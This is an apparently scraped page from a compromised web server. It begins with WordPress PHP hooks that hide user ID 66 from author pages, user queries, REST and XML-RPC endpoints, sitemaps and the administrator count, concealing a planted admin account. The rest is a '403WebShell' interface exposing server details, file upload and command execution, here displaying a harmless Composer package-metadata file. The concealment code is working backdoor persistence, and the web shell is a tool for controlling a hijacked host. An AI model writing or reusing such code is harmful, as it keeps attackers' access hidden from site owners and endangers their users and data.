add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-psr~http-message.json
{"minified":"composer/2.0","packages":{"psr/http-message":[{"name":"psr/http-message","description":"Common interface for HTTP messages","keywords":["http","response","request","psr","psr-7","http-message"],"homepage":"https://github.com/php-fig/http-message","version":"2.0","version_normalized":"2.0.0.0","license":["MIT"],"authors":[{"name":"PHP-FIG","homepage":"https://www.php-fig.org/"}],"source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"402d35bcb92c70c026d1a6a9883f06b2ead23d71"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/402d35bcb92c70c026d1a6a9883f06b2ead23d71","type":"zip","shasum":"","reference":"402d35bcb92c70c026d1a6a9883f06b2ead23d71"},"type":"library","support":{"source":"https://github.com/php-fig/http-message/tree/2.0"},"funding":[],"time":"2023-04-04T09:54:51+00:00","autoload":{"psr-4":{"Psr\\Http\\Message\\":"src/"}},"extra":{"branch-alias":{"dev-master":"2.0.x-dev"}},"require":{"php":"^7.2 || ^8.0"}},{"version":"1.1","version_normalized":"1.1.0.0","authors":[{"name":"PHP-FIG","homepage":"http://www.php-fig.org/"}],"source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"cb6ce4845ce34a8ad9e68117c10ee90a29919eba"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/cb6ce4845ce34a8ad9e68117c10ee90a29919eba","type":"zip","shasum":"","reference":"cb6ce4845ce34a8ad9e68117c10ee90a29919eba"},"support":{"source":"https://github.com/php-fig/http-message/tree/1.1"},"time":"2023-04-04T09:50:52+00:00","extra":{"branch-alias":{"dev-master":"1.1.x-dev"}}},{"version":"1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"f6561bf28d520154e4b0ec72be95418abe6d9363"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/f6561bf28d520154e4b0ec72be95418abe6d9363","type":"zip","shasum":"","reference":"f6561bf28d520154e4b0ec72be95418abe6d9363"},"support":{"source":"https://github.com/php-fig/http-message/tree/master"},"time":"2016-08-06T14:39:51+00:00","extra":{"branch-alias":{"dev-master":"1.0.x-dev"}},"require":{"php":">=5.3.0"},"funding":"__unset"},{"homepage":"","version":"1.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"85d63699f0dbedb190bbd4b0d2b9dc707ea4c298"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/85d63699f0dbedb190bbd4b0d2b9dc707ea4c298","type":"zip","shasum":"","reference":"85d63699f0dbedb190bbd4b0d2b9dc707ea4c298"},"support":{"issues":"https://github.com/php-fig/http-message/issues","source":"https://github.com/php-fig/http-message/tree/master"},"time":"2015-05-04T20:22:00+00:00"},{"version":"0.11.0","version_normalized":"0.11.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"809419e498a388dfa7ef6898392431e5911a0289"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/809419e498a388dfa7ef6898392431e5911a0289","type":"zip","shasum":"","reference":"809419e498a388dfa7ef6898392431e5911a0289"},"time":"2015-05-04T20:20:08+00:00","autoload":{"psr-4":{"Psr\\Http\\Message\\":"src"}},"require":"__unset"},{"version":"0.10.1","version_normalized":"0.10.1.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"9723465b3e7c8ecb0436f066bfb8a13e1bac1789"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/9723465b3e7c8ecb0436f066bfb8a13e1bac1789","type":"zip","shasum":"","reference":"9723465b3e7c8ecb0436f066bfb8a13e1bac1789"},"time":"2015-04-13T14:20:01+00:00"},{"version":"0.10.0","version_normalized":"0.10.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"116ee9239e02e06d59d922b24d892c726a09786c"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/116ee9239e02e06d59d922b24d892c726a09786c","type":"zip","shasum":"","reference":"116ee9239e02e06d59d922b24d892c726a09786c"},"time":"2015-04-13T13:52:57+00:00"},{"version":"0.9.2","version_normalized":"0.9.2.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"7c361ae6b0dcd84d8fc4f89636ee0cc9fcb02035"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/7c361ae6b0dcd84d8fc4f89636ee0cc9fcb02035","type":"zip","shasum":"","reference":"7c361ae6b0dcd84d8fc4f89636ee0cc9fcb02035"},"time":"2015-03-18T22:07:07+00:00"},{"version":"0.9.1","version_normalized":"0.9.1.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"83826b66ae8353aee295f236790a6a188e5c21de"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/83826b66ae8353aee295f236790a6a188e5c21de","type":"zip","shasum":"","reference":"83826b66ae8353aee295f236790a6a188e5c21de"},"time":"2015-03-04T22:45:46+00:00"},{"version":"0.9.0","version_normalized":"0.9.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"4727540cebedd52cfd5dcc98c18fc20a24ba7372"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/4727540cebedd52cfd5dcc98c18fc20a24ba7372","type":"zip","shasum":"","reference":"4727540cebedd52cfd5dcc98c18fc20a24ba7372"},"time":"2015-02-13T01:35:55+00:00"},{"version":"0.8.0","version_normalized":"0.8.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"3e35e0ade470539fc29e8c1667691bc81d21c222"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/3e35e0ade470539fc29e8c1667691bc81d21c222","type":"zip","shasum":"","reference":"3e35e0ade470539fc29e8c1667691bc81d21c222"},"time":"2015-01-28T19:53:42+00:00"},{"version":"0.7.0","version_normalized":"0.7.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"d70356c7acd5b90b0b9ad997ab3461d689604f87"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/d70356c7acd5b90b0b9ad997ab3461d689604f87","type":"zip","shasum":"","reference":"d70356c7acd5b90b0b9ad997ab3461d689604f87"},"time":"2015-01-28T15:42:51+00:00"},{"version":"0.6.0","version_normalized":"0.6.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"70d7c442866f109cbda7f9dea8938e47fc3cc20c"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/70d7c442866f109cbda7f9dea8938e47fc3cc20c","type":"zip","shasum":"","reference":"70d7c442866f109cbda7f9dea8938e47fc3cc20c"},"time":"2015-01-18T23:26:37+00:00"},{"version":"0.5.1","version_normalized":"0.5.1.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"18619eee10ecf266bafe048e5a2922fa20938498"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/18619eee10ecf266bafe048e5a2922fa20938498","type":"zip","shasum":"","reference":"18619eee10ecf266bafe048e5a2922fa20938498"},"time":"2014-11-04T14:03:01+00:00"},{"version":"0.5.0","version_normalized":"0.5.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"8d0a1c5a0bb204bac26ce982d169ff9749f170cd"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/8d0a1c5a0bb204bac26ce982d169ff9749f170cd","type":"zip","shasum":"","reference":"8d0a1c5a0bb204bac26ce982d169ff9749f170cd"},"time":"2014-11-03T14:29:51+00:00"},{"version":"0.4.0","version_normalized":"0.4.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"05f67fe3f44fa213b543160452cfc202304a7e06"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/05f67fe3f44fa213b543160452cfc202304a7e06","type":"zip","shasum":"","reference":"05f67fe3f44fa213b543160452cfc202304a7e06"},"time":"2014-10-17T16:13:56+00:00"},{"version":"0.3.0","version_normalized":"0.3.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"69271a585d8f5fc210a55cb5aa9bac86380d0521"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/69271a585d8f5fc210a55cb5aa9bac86380d0521","type":"zip","shasum":"","reference":"69271a585d8f5fc210a55cb5aa9bac86380d0521"},"time":"2014-10-13T16:47:50+00:00"},{"version":"0.2.0","version_normalized":"0.2.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"0544bddcd574eab8c14a936288141db58a643dae"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/0544bddcd574eab8c14a936288141db58a643dae","type":"zip","shasum":"","reference":"0544bddcd574eab8c14a936288141db58a643dae"},"time":"2014-10-01T16:15:43+00:00"},{"version":"0.1.0","version_normalized":"0.1.0.0","source":{"url":"https://github.com/php-fig/http-message.git","type":"git","reference":"98ef8f215a7b86af3fd35b98b98bc79c15057f65"},"dist":{"url":"https://api.github.com/repos/php-fig/http-message/zipball/98ef8f215a7b86af3fd35b98b98bc79c15057f65","type":"zip","shasum":"","reference":"98ef8f215a7b86af3fd35b98b98bc79c15057f65"},"time":"2014-07-10T17:31:27+00:00"}]},"security-advisories":[],"last-modified":"Sat, 13 Apr 2024 07:57:04 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit